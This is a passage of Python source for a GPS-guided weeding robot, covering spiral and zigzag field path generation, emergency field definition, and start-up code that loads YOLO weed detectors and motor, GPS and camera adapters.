msg = f"Point {point_name} of given ABCD field must be a list, got {type(point).__name__} instead"
raise TypeError(msg)
if len(point) < 2:
msg = f"Point {point_name} of given ABCD field must contain >=2 items, found {str(len(point))} instead"
raise ValueError(msg)
if path is None:
path = []
elif type(path) != list:
msg = f"Given ABCD path must be a list type, got {type(path).__name__} instead"
raise TypeError(msg)
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
# separate stop-flags and BC & AD length control allows correct processing 4 corner non 90 degrees fields
bc_dist_ok = ad_dist_ok = True
while bc_dist_ok or ad_dist_ok:
if not add_points_to_path(path, [b, SI_speed_fwd]):
msg = f"Failed to add point B={str(b)} to path. This expected never to happen."
raise RuntimeError(msg)
if not add_points_to_path(path, [a, SI_speed_rev]):
msg = f"Failed to add point A={str(a)} to path. This expected never to happen."
raise RuntimeError(msg)
if nav.get_distance(b, c) >= config.SPIRAL_SIDES_INTERVAL:
b = nav.get_point_on_vector(b, c, config.SPIRAL_SIDES_INTERVAL)
else:
bc_dist_ok = False
if nav.get_distance(a, d) >= config.SPIRAL_SIDES_INTERVAL:
a = nav.get_point_on_vector(a, d, config.SPIRAL_SIDES_INTERVAL)
else:
ad_dist_ok = False
return path
def build_bezier_with_corner_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float):
raise NotImplementedError(
"an obsolete code, use build_bezier_path() instead")
path = []
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
fwd = SI_speed_fwd
rev = SI_speed_rev
_break = False
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(a, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, d2 = compute_x1_x2_points(d, a, nav, logger)
a1_spiral = nav.get_coordinate(a1, a, 90, config.SPIRAL_SIDES_INTERVAL)
_, a_spiral = compute_x1_x2(d, a, config.SPIRAL_SIDES_INTERVAL, nav)
if not add_points_to_path(path, [a, fwd]):
raise RuntimeError("Failed to add original point A into generated path. "
"This could happen if input field's point A is None.")
first_bezier_turn = compute_bezier_points(a2, b, b1)
second_bezier_turn = compute_bezier_points(b2, c, c1)
third_bezier_turn = compute_bezier_points(c2, d, d1)
fourth_bezier_turn = compute_bezier_points(d2, a_spiral, a1_spiral)
# minimum turning radius given in millimeter
turning_radius = config.MANEUVER_START_DISTANCE
if config.ADD_CORNER_TO_BEZIER_PATH:
rnd = 0
rnds = corner_finish_rounds(turning_radius)
# example a 3meter radius requires 4 corners finish
for rnd in range(rnds+1):
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
mxt = "corner rnd "+str(rnd)+"/"+str(rnds)
# the direction is given along with the point in meter per second, signed
# go to line forward, step back to the turning point "a1"
if not add_points_to_path(path, [b, fwd, "B "+mxt]):
return path
for index in range(0, len(first_bezier_turn)):
if index == 0:
if not add_points_to_path(path, [first_bezier_turn[index], rev]):
return path
else:
if not add_points_to_path(path, [first_bezier_turn[index], fwd]):
return path
if not add_points_to_path(path, [b, rev, mxt]):
return path
if not add_points_to_path(path, [c, fwd, "C "+mxt]):
return path
for index in range(0, len(second_bezier_turn)):
if index == 0:
if not add_points_to_path(path, [second_bezier_turn[index], rev]):
return path
else:
if not add_points_to_path(path, [second_bezier_turn[index], fwd]):
return path
if not add_points_to_path(path, [c, rev, mxt]):
return path
if not add_points_to_path(path, [d, fwd, "D "+mxt]):
return path
for index in range(0, len(third_bezier_turn)):
if index == 0:
if not add_points_to_path(path, [third_bezier_turn[index], rev]):
return path
else:
if not add_points_to_path(path, [third_bezier_turn[index], fwd]):
return path
if not add_points_to_path(path, [d, rev, mxt]):
return path
if not add_points_to_path(path, [a, fwd, "A "+mxt]):
return path
for index in range(0, len(fourth_bezier_turn)):
if index == 0:
if not add_points_to_path(path, [fourth_bezier_turn[index], rev]):
return path
else:
if not add_points_to_path(path, [fourth_bezier_turn[index], fwd]):
return path
# if not add_points_to_path(path, [a,rev,mxt] ):
if not add_points_to_path(path, [a_spiral, rev, mxt]):
return path
# get A'B'C'D' (prepare next ABCD points)
b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
return path
a_new, b_new = compute_x1_x2_int_points(
d2_int, b1_int, nav, logger)
c_new, d_new = compute_x1_x2_int_points(
b2_int, d1_int, nav, logger)
if not check_points_for_nones(a_new, b_new, c_new, d_new):
return path
a, b, c, d, d2_int_prev = a_new, b_new, c_new, d_new, d2_int
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(d2_int_prev, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, d2 = compute_x1_x2_points(d, a, nav, logger)
for point in [a, b, c, d, a1, b1, c1, d1, a2, b2, c2, d2]:
if point is None:
return path
a1_spiral = nav.get_coordinate(
a1, a, 90, config.SPIRAL_SIDES_INTERVAL)
_, a_spiral = compute_x1_x2(
d, a, config.SPIRAL_SIDES_INTERVAL, nav)
for point in [a1_spiral, a_spiral]:
if point is None:
if not _break:
_break = True
break
if _break:
break
first_bezier_turn = compute_bezier_points(a2, b, b1)
second_bezier_turn = compute_bezier_points(b2, c, c1)
third_bezier_turn = compute_bezier_points(c2, d, d1)
fourth_bezier_turn = compute_bezier_points(d2, a_spiral, a1_spiral)
while True:
# get A'B'C'D' (prepare next ABCD points)
b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
raise RuntimeError("Some of intermediate points [B1 B2 D1 D2] for next spiral generation are None. "
"This may happen if current distance between points is too small for robot maneuvers.")
d2_int_prev = d2_int
a_new, b_new = compute_x1_x2_int_points(d2_int, b1_int, nav, logger)
c_new, d_new = compute_x1_x2_int_points(b2_int, d1_int, nav, logger)
if not check_points_for_nones(a_new, b_new, c_new, d_new):
raise RuntimeError("Some of next iteration field points [A_new B_new C_new D_new] are None. "
"This may happen if current distance between points is too small for robot maneuvers.")
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(d2_int_prev, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, d2 = compute_x1_x2_points(d, a, nav, logger)
if None in [a, b, c, d, a1, b1, c1, d1, a2, b2, c2, d2]:
if nav.get_distance(a, b) >= nav.get_distance(b, c):
a = compute_x1_x2(a, d, config.SPIRAL_SIDES_INTERVAL, nav)[0]
b = compute_x1_x2(b, c, config.SPIRAL_SIDES_INTERVAL, nav)[0]
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
else:
raise RuntimeError("Some of [A A1 A2 B B1 B2 C C1 C2 D D1 D2] points are None AND AB < BC. "
"Old code, not sure why author raises an exception for such condition.")
a1_spiral = nav.get_coordinate(a1, a, 90, config.SPIRAL_SIDES_INTERVAL)
_, a_spiral = compute_x1_x2(d, a, config.SPIRAL_SIDES_INTERVAL, nav)
if None in [a1_spiral, a_spiral]:
raise RuntimeError(
"One of [A_spiral A1_spiral] points are None. This case actually should never happen.")
first_bezier_turn = compute_bezier_points(a2, b, b1)
second_bezier_turn = compute_bezier_points(b2, c, c1)
third_bezier_turn = compute_bezier_points(c2, d, d1)
fourth_bezier_turn = compute_bezier_points(d2, a_spiral, a1_spiral)
if nav.get_distance(a, b) >= nav.get_distance(b, c):
if None in first_bezier_turn+second_bezier_turn:
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
first_bezier_turn_with_speed = [[point, fwd]
for point in first_bezier_turn]
second_bezier_turn_with_speed = [
[point, fwd] for point in second_bezier_turn]
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, *(first_bezier_turn_with_speed+second_bezier_turn_with_speed)):
raise Exception(
"Error during generate path (build_bezier_with_corner_path:01) !")
if None in third_bezier_turn+fourth_bezier_turn:
return add_forward_backward_path([c, d, a, b], nav, logger, SI_speed_fwd, SI_speed_rev, path)
third_bezier_turn_with_speed = [[point, fwd]
for point in third_bezier_turn]
fourth_bezier_turn_with_speed = [
[point, fwd] for point in fourth_bezier_turn]
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, *(third_bezier_turn_with_speed+fourth_bezier_turn_with_speed)):
raise Exception(
"Error during generate path (build_bezier_with_corner_path:02) !")
else:
first_bezier_turn_with_speed = [[point, fwd]
for point in first_bezier_turn]
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, *(first_bezier_turn_with_speed)):
raise Exception(
"Error during generate path (build_bezier_with_corner_path:03) !")
if None in second_bezier_turn+third_bezier_turn:
return add_forward_backward_path([b, c, d, a], nav, logger, SI_speed_fwd, SI_speed_rev, path)
second_bezier_turn_with_speed = [
[point, fwd] for point in second_bezier_turn]
third_bezier_turn_with_speed = [[point, fwd]
for point in third_bezier_turn]
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, *(second_bezier_turn_with_speed+third_bezier_turn_with_speed)):
raise Exception(
"Error during generate path (build_bezier_with_corner_path:04) !")
_, next_a2 = compute_x1_x2_points(d2_int, b_new, nav, logger)
next_b1, _ = compute_x1_x2_points(b_new, c_new, nav, logger)
if None in fourth_bezier_turn or None in [next_a2, b_new, next_b1]:
return add_forward_backward_path([d, a, b, c], nav, logger, SI_speed_fwd, SI_speed_rev, path)
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
fourth_bezier_turn_with_speed = [
[point, fwd] for point in fourth_bezier_turn]
if not add_points_to_path(path, *(fourth_bezier_turn_with_speed)):
raise Exception(
"Error during generate path (build_bezier_with_corner_path:05 !")
a, b, c, d, d2_int_prev = a_new, b_new, c_new, d_new, d2_int
def build_bezier_path(abcd_points: list,
nav: navigation.GPSComputing,
logger: utility.Logger,
SI_speed_fwd: float,
SI_speed_rev: float):
"""Builds spiral path to fill given ABCD field.
Fills field's missing center with zigzag (forward-backward) movement if config.ADD_FORWARD_BACKWARD_TO_END_PATH
is set to True.
Returns python list of gps [[latitude, longitude], speed] points."""
if config.ADD_CORNER_TO_BEZIER_PATH:
raise NotImplementedError(
"config.ADD_CORNER_TO_BEZIER_PATH feature is not ready in new path builder yet")
if type(abcd_points) != list:
msg = f"Given ABCD path must be a list, got {type(abcd_points).__name__} instead"
raise TypeError(msg)
if len(abcd_points) != 4:
msg = f"Expected 4 ABCD points as input field, got {str(len(abcd_points))} points instead"
raise ValueError(msg)
for point_name, point in zip("ABCD", abcd_points):
if type(point) != list:
msg = f"Point {point_name} of given ABCD field must be a list, got {type(point).__name__} instead"
raise TypeError(msg)
if len(point) < 2:
msg = f"Point {point_name} of given ABCD field must contain >=2 items, found {str(len(point))} instead"
raise ValueError(msg)
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
path = []
center_fill_start_point = 0 # 0 is unidentified, 1 is A, 2 is D
if not add_points_to_path(path, [a, SI_speed_fwd]):
raise RuntimeError(
"Failed to add point A (the once of input field description points) into generated path")
while True:
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(a, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, _ = compute_x1_x2_points(d, a, nav, logger)
if not check_points_for_nones(a1, a2, b1, b2, c1, c2, d1):
center_fill_start_point = 1
break
b_corner_bezier = compute_bezier_points(a2, b, b1)
if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], b_corner_bezier)):
raise RuntimeError(
"Failed to add B corner's bezier curve to path. This expected never to happen.")
c_corner_bezier = compute_bezier_points(b2, c, c1)
if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], c_corner_bezier)):
raise RuntimeError(
"Failed to add C corner's bezier curve to path. This expected never to happen.")
d_corner_bezier = compute_bezier_points(c2, d, d1)
if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], d_corner_bezier)):
raise RuntimeError(
"Failed to add D corner's bezier curve to path. This expected never to happen.")
# check before computing d2 and A corner bezier curve (see d2 computing comments below for details)
if nav.get_distance(d, a) <= config.MANEUVER_START_DISTANCE * 2 + config.SPIRAL_SIDES_INTERVAL \
or nav.get_distance(a, b) <= config.MANEUVER_START_DISTANCE:
center_fill_start_point = 2
break
# d2 isn't as other x2 points as d2 distance from A is spiral_sides_interval + start_turn_distance
# instead of just start_turn_distance, so DA acceptable length computing is different (+spiral side interval)
d2 = nav.get_point_on_vector(
a, d, config.SPIRAL_SIDES_INTERVAL + config.MANEUVER_START_DISTANCE)
a_spiral = nav.get_point_on_vector(a, d, config.SPIRAL_SIDES_INTERVAL)
# a1_spiral point is inside the initial field, corner of D-A_spiral-A1_spiral = 90 degrees
a1_spiral = nav.get_coordinate(
a_spiral, d, 90, config.MANEUVER_START_DISTANCE)
a_corner_bezier = compute_bezier_points(d2, a_spiral, a1_spiral)
if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], a_corner_bezier)):
raise RuntimeError(
"Failed to add A corner's bezier curve to path. This expected never to happen.")
# get A'B'C'D' (intermediate points used to compute new ABCD points for next iteration)
# (int points are requiring given vector length >= spiral_sides_interval * 2
# it is very small value and can be exceeded only if robot can turn almost inplace)
b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
msg = "Some of intermediate points [B1_int B2_int D1_int D2_int] for next spiral generation are None. " \
"This could happen if spiral shift value is higher than robot's maneuverability. " \
"Check config.MANEUVER_START_DISTANCE and config.SPIRAL_SIDES_INTERVAL for wrong values."
raise RuntimeError(msg)
a_new, b_new = compute_x1_x2_int_points(d2_int, b1_int, nav, logger)
c_new, d_new = compute_x1_x2_int_points(b2_int, d1_int, nav, logger)
if not check_points_for_nones(a_new, b_new, c_new, d_new):
msg = "Some of points [A_new B_new C_new D_new] for next spiral generation iteration are None. " \
"This could happen if spiral shift value is higher than robot's maneuverability. " \
"Check config.MANEUVER_START_DISTANCE and config.SPIRAL_SIDES_INTERVAL for wrong values."
raise RuntimeError(msg)
a, b, c, d = a_new, b_new, c_new, d_new
if config.ADD_FORWARD_BACKWARD_TO_END_PATH:
if center_fill_start_point == 0:
msg = "Asked to fill field's center during path building, but filling start position point flag was not " \
"changed from it's initial value."
raise RuntimeError(msg)
elif center_fill_start_point == 1: # when robot is going to stop spiral movement at point A'n
path = build_forward_backward_path(
[a, b, c, d],
nav,
logger,
SI_speed_fwd,
SI_speed_rev,
path)
elif center_fill_start_point == 2: # when robot is going to stop spiral movement at point D'n
path = build_forward_backward_path(
[d, a, b, c],
nav,
logger,
SI_speed_fwd,
SI_speed_rev,
path)
else:
msg = "Asked to fill field's center during path building, but filling start position point flag value " \
"is not supported."
raise NotImplementedError(msg)
return path
def build_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float):
raise NotImplementedError(
"an obsolete code, use more advanced path builders like bezier or zigzag")
path = []
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(a, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, d2 = compute_x1_x2_points(d, a, nav, logger)
d2_spiral = compute_x2_spiral(d, a, nav, logger)
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, [a, SI_speed_fwd], [a1, SI_speed_fwd], [a2, SI_speed_fwd], [b1, SI_speed_fwd], [b2, SI_speed_fwd], [c1, SI_speed_fwd], [c2, SI_speed_fwd], [d1, SI_speed_fwd], [d2_spiral, SI_speed_fwd]):
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
# get A'B'C'D' (prepare next ABCD points)
b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
a_new, b_new = compute_x1_x2_int_points(d2_int, b1_int, nav, logger)
c_new, d_new = compute_x1_x2_int_points(b2_int, d1_int, nav, logger)
if not check_points_for_nones(a_new, b_new, c_new, d_new):
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
a, b, c, d, d2_int_prev = a_new, b_new, c_new, d_new, d2_int
# keep reducing sides for spiral
while True:
# get A'B'C'D' (prepare next ABCD points)
b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
break
a_new, b_new = compute_x1_x2_int_points(d2_int, b1_int, nav, logger)
c_new, d_new = compute_x1_x2_int_points(b2_int, d1_int, nav, logger)
if not check_points_for_nones(a_new, b_new, c_new, d_new):
break
# get moving points A1 - ... - D2 spiral
a1, a2 = compute_x1_x2_points(d2_int_prev, b, nav, logger)
b1, b2 = compute_x1_x2_points(b, c, nav, logger)
c1, c2 = compute_x1_x2_points(c, d, nav, logger)
d1, d2 = compute_x1_x2_points(d, a, nav, logger)
d2_spiral = compute_x2_spiral(d, a, nav, logger)
# check if there's a point(s) which shouldn't be used as there's no place for robot maneuvers
if not add_points_to_path(path, [a1, SI_speed_fwd], [a2, SI_speed_fwd], [b1, SI_speed_fwd], [b2, SI_speed_fwd], [c1, SI_speed_fwd], [c2, SI_speed_fwd], [d1, SI_speed_fwd], [d2_spiral, SI_speed_fwd]):
break
a, b, c, d, d2_int_prev = a_new, b_new, c_new, d_new, d2_int
if nav.get_distance(a, b) >= nav.get_distance(b, c):
return add_forward_backward_path([a, b, c, d], nav, logger, SI_speed_fwd, SI_speed_rev, path)
else:
return add_forward_backward_path([c, b, a, d], nav, logger, SI_speed_rev, SI_speed_fwd, path)
def compute_x1_x2(point_a, point_b, distance, nav: navigation.GPSComputing):
"""
Computes and returns two points on given vector [A, B], where vector [A, X1] = distance, vector [X2, B] = distance
:param point_a:
:param point_b:
:param distance:
:param nav:
:return:
"""
ab_dist = nav.get_distance(point_a, point_b)
if ab_dist < distance:
raise ValueError("Size of AB vector (" + str(ab_dist) + ") should be greater than a given distance: " +
str(distance))
x1 = nav.get_point_on_vector(point_a, point_b, distance)
x2 = nav.get_point_on_vector(point_a, point_b, ab_dist - distance)
return x1, x2
def reduce_field_size(abcd_points: list, reduce_size, nav: navigation.GPSComputing):
"""
Reduces given ABCD field for given distance from each side, returns new ABCD field
:param abcd_points:
:param reduce_size:
:param nav:
:return:
"""
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
b1_dist, b2_dist = compute_x1_x2(b, c, reduce_size, nav)
d1_dist, d2_dist = compute_x1_x2(d, a, reduce_size, nav)
a_new, b_new = compute_x1_x2(d2_dist, b1_dist, reduce_size, nav)
c_new, d_new = compute_x1_x2(b2_dist, d1_dist, reduce_size, nav)
return [a_new, b_new, c_new, d_new]
def emergency_field_defining(vesc_engine: adapters.VescAdapterV4, gps: adapters.GPSUbloxAdapter,
nav: navigation.GPSComputing, cur_log_dir, logger_full: utility.Logger):
msg = "Using emergency field creation..."
logger_full.write(msg + "\n")
print(msg)
starting_point = gps.get_last_position()
msg = "Moving forward..."
logger_full.write(msg + "\n")
print(msg)
vesc_engine.set_time_to_move(float("inf"), vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(engine_key=vesc_engine.PROPULSION_KEY)
time.sleep(config.EMERGENCY_MOVING_TIME)
vesc_engine.stop_moving(engine_key=vesc_engine.PROPULSION_KEY)
msg = "Getting point A..."
logger_full.write(msg + "\n")
print(msg)
time.sleep(2)
A = gps.get_last_position()
msg = "Computing rest points..."
logger_full.write(msg + "\n")
print(msg)
B = nav.get_coordinate(A, starting_point, 180, config.EMERGENCY_FIELD_SIZE)
C = nav.get_coordinate(B, A, 90, config.EMERGENCY_FIELD_SIZE)
D = nav.get_coordinate(C, B, 90, config.EMERGENCY_FIELD_SIZE)
msg = "Saving field.txt file..."
logger_full.write(msg + "\n")
print(msg)
field = [A, B, C, D]
save_gps_coordinates(field, "field.txt")
save_gps_coordinates_raw(
[starting_point, A, B, C, D], cur_log_dir + "emergency_raw_field.txt")
return field
def send_name_of_file_of_gps_history(ui_msg_queue: posix_ipc.MessageQueue,
gps_file_dir: str,
gps_file_name: str,
logger_full: utility.Logger):
"""Send name of file if it exists using given message queue
"""
if os.path.isfile(gps_file_dir + gps_file_name):
ui_msg_queue.send(json.dumps(
{"last_gps_list_file": gps_file_dir + gps_file_name}))
else:
msg = f"Could not find {gps_file_dir}/used_gps_history.txt file to send previous points to the web UI"
logger_full.write(msg + "\n")
if config.VERBOSE:
print(msg)
def get_bezier_indexes(path_points: list):
"""ONLY for bezier path with NO backward-forward at corners. Presence of zigzags at field center is ok.
Returns list of bezier points indexes."""
if len(path_points) < 2:
raise ValueError(f"path_points must contain at least 2 points, got {len(path_points)} instead")
last_non_zigzag_idx = 0
for i in range(len(path_points)):
if math.isclose(path_points[i][1], 0):
raise ValueError(f"POINT {i} HAS 0 SPEED!")
elif path_points[i][1] > 0:
last_non_zigzag_idx = i
else:
break
a_non_bezier_indexes = [0] # A points
b_non_bezier_indexes = [1] # B points
while last_non_zigzag_idx > b_non_bezier_indexes[-1]:
a_non_bezier_indexes.append(a_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
b_non_bezier_indexes.append(b_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
non_bezier_indexes = a_non_bezier_indexes + b_non_bezier_indexes
bezier_indexes = []
for i in range(last_non_zigzag_idx + 1):
if i not in non_bezier_indexes:
bezier_indexes.append(i)
return bezier_indexes
def main():
time_start = utility.get_current_time()
utility.create_directories(config.LOG_ROOT_DIR)
# choose log dir dependent continuing previous path or not
if config.CONTINUE_PREVIOUS_PATH:
last_log_dir = utility.get_last_dir_name(config.LOG_ROOT_DIR)
if last_log_dir is not None:
log_cur_dir = config.LOG_ROOT_DIR + last_log_dir + "/"
else:
log_cur_dir = config.LOG_ROOT_DIR + time_start + "/"
else:
log_cur_dir = config.LOG_ROOT_DIR + time_start + "/"
utility.create_directories(
log_cur_dir, config.DEBUG_IMAGES_PATH, config.DATA_GATHERING_DIR)
try:
if config.QUEUE_MESSAGES_MAX is not None:
ui_msg_queue = posix_ipc.MessageQueue(
config.QUEUE_NAME_UI_MAIN, max_messages=config.QUEUE_MESSAGES_MAX)
else:
ui_msg_queue = posix_ipc.MessageQueue(config.QUEUE_NAME_UI_MAIN)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
ui_msg_queue = None
image_saver = utility.ImageSaver()
if config.ALLOW_GATHERING:
image_saver.set_counter(
len(glob.glob(config.DATA_GATHERING_DIR + "*.jpg")), "gathering")
notification = NotificationClient(time_start)
notification.set_robot_state(RobotStates.WORKING)
data_collector = datacollection.DataCollector(
log_cur_dir + config.STATISTICS_DB_FILE_NAME,
notification,
load_from_file=config.CONTINUE_PREVIOUS_PATH,
file_path=log_cur_dir + config.DATACOLLECTOR_SAVE_FILE,
ui_msg_queue=ui_msg_queue,
dump_at_receiving=True)
working_zone_polygon = Polygon(config.WORKING_ZONE_POLY_POINTS)
nav = navigation.GPSComputing()
logger_full = utility.Logger(
log_cur_dir + "log full.txt", append_file=config.CONTINUE_PREVIOUS_PATH)
# X axis movement during periphery scans config settings validation
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
if len(config.X_MOVEMENT_CAMERA_POSITIONS) != len(config.X_MOVEMENT_CAMERA_X_F) != \
len(config.X_MOVEMENT_IMAGE_ZONES) or len(config.X_MOVEMENT_CAMERA_POSITIONS) in [0, 1]:
msg = "Disabling X axis movement during scans as lengths of positions/forces/image areas are not equal " \
"or there's less than 2 elements in list of positions/forces/image areas!"
logger_full.write(msg + "\n")
print(msg)
config.ALLOW_X_MOVEMENT_DURING_SCANS = False
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
x_scan_poly = ExtractionManagerV3.pdz_dist_to_poly(
config.X_MOVEMENT_IMAGE_ZONES)
else:
x_scan_poly = []
# get smoothie and vesc addresses
smoothie_vesc_addr = utility.get_smoothie_vesc_addresses()
if "vesc" in smoothie_vesc_addr:
vesc_address = smoothie_vesc_addr["vesc"]
else:
msg = "Couldn't get vesc's USB address!"
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
if config.SMOOTHIE_BACKEND == 1:
smoothie_address = config.SMOOTHIE_HOST
else:
if "smoothie" in smoothie_vesc_addr:
smoothie_address = smoothie_vesc_addr["smoothie"]
else:
msg = "Couldn't get smoothie's USB address!"
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# load yolo networks
if config.NN_MODELS_COUNT < 1:
msg = f"Key 'config.NN_MODELS_COUNT' has 0 or negative value which is wrong as need at least 1 model for work"
print(msg)
logger_full.write(msg + "\n")
exit()
# load periphery NN
msg = "Loading periphery detector..."
print(msg)
logger_full.write(msg + "\n")
if config.PERIPHERY_WRAPPER == 1:
periphery_detector = detection.YoloTRTDetector(
config.PERIPHERY_MODEL_PATH,
config.PERIPHERY_CLASSES_FILE,
config.PERIPHERY_CONFIDENCE_THRESHOLD,
config.PERIPHERY_NMS_THRESHOLD,
config.PERIPHERY_INPUT_SIZE)
elif config.PERIPHERY_WRAPPER == 2:
periphery_detector = detection.YoloOpenCVDetection(
config.PERIPHERY_CLASSES_FILE,
config.PERIPHERY_CONFIG_FILE,
config.PERIPHERY_WEIGHTS_FILE,
config.PERIPHERY_INPUT_SIZE,
config.PERIPHERY_CONFIDENCE_THRESHOLD,
config.PERIPHERY_NMS_THRESHOLD,
config.PERIPHERY_DNN_BACKEND,
config.PERIPHERY_DNN_TARGET)
else:
msg = "Wrong config.PERIPHERY_WRAPPER = " + \
str(config.PERIPHERY_WRAPPER) + " code. Exiting."
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# load precise NN
if config.NN_MODELS_COUNT > 1:
msg = "Loading precise detector..."
print(msg)
logger_full.write(msg + "\n")
if config.PRECISE_WRAPPER == 1:
precise_detector = detection.YoloTRTDetector(
config.PRECISE_MODEL_PATH,
config.PRECISE_CLASSES_FILE,
config.PRECISE_CONFIDENCE_THRESHOLD,
config.PRECISE_NMS_THRESHOLD,
config.PRECISE_INPUT_SIZE)
elif config.PRECISE_WRAPPER == 2:
precise_detector = detection.YoloOpenCVDetection(
config.PRECISE_CLASSES_FILE,
config.PRECISE_CONFIG_FILE,
config.PRECISE_WEIGHTS_FILE,
config.PRECISE_INPUT_SIZE,
config.PRECISE_CONFIDENCE_THRESHOLD,
config.PRECISE_NMS_THRESHOLD,
config.PRECISE_DNN_BACKEND,
config.PRECISE_DNN_TARGET)
else:
msg = "Wrong config.PRECISE_WRAPPER = " + \
str(config.PRECISE_WRAPPER) + " code. Exiting."
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
else:
msg = "Using periphery detector as precise."
print(msg)
logger_full.write(msg + "\n")
precise_detector = periphery_detector
if config.CONTINUOUS_INFORMATION_SENDING:
treated_plants = set()
treated_plants.update(periphery_detector.get_classes_names())
treated_plants.update(precise_detector.get_classes_names())
notification.set_treated_weed_types(treated_plants)
# load and send trajectory to the UI if continuing work
if config.CONTINUE_PREVIOUS_PATH:
if ui_msg_queue is not None:
send_name_of_file_of_gps_history(
ui_msg_queue, log_cur_dir, "used_gps_history.txt", logger_full)
else:
msg = "GPS message queue connection is not established (None), canceling gps sending to UI"
logger_full.write(msg + "\n")
if config.VERBOSE:
print(msg)
# sensors picking
report_field_names = ['temp_fet_filtered', 'temp_motor_filtered', 'avg_motor_current',
'avg_input_current', 'rpm', 'input_voltage']
try:
msg = "Initializing..."
print(msg)
logger_full.write(msg + "\n")
vesc_speed = config.SI_SPEED_FWD*config.MULTIPLIER_SI_SPEED_TO_RPM
# stubs.GPSStub(config.GPS_PORT, config.GPS_BAUDRATE, config.GPS_POSITIONS_TO_KEEP) as gps, \
# utility.MemoryManager(config.DATA_GATHERING_DIR, config.FILES_TO_KEEP_COUNT) as memory_manager, \
with \
utility.TrajectorySaver(log_cur_dir + "used_gps_history.txt",
config.CONTINUE_PREVIOUS_PATH) as trajectory_saver, \
adapters.VescAdapterV4(vesc_address, config.VESC_BAUDRATE, config.VESC_ALIVE_FREQ, config.VESC_CHECK_FREQ,
config.VESC_STOPPER_CHECK_FREQ) as vesc_engine, \
adapters.SmoothieAdapter(smoothie_address) as smoothie, \
adapters.GPSUbloxAdapter(config.GPS_PORT, config.GPS_BAUDRATE, config.GPS_POSITIONS_TO_KEEP) as gps, \
adapters.CameraAdapterIMX219_170(config.CROP_W_FROM, config.CROP_W_TO, config.CROP_H_FROM,
config.CROP_H_TO, config.CV_ROTATE_CODE,
config.ISP_DIGITAL_GAIN_RANGE_FROM,
config.ISP_DIGITAL_GAIN_RANGE_TO,
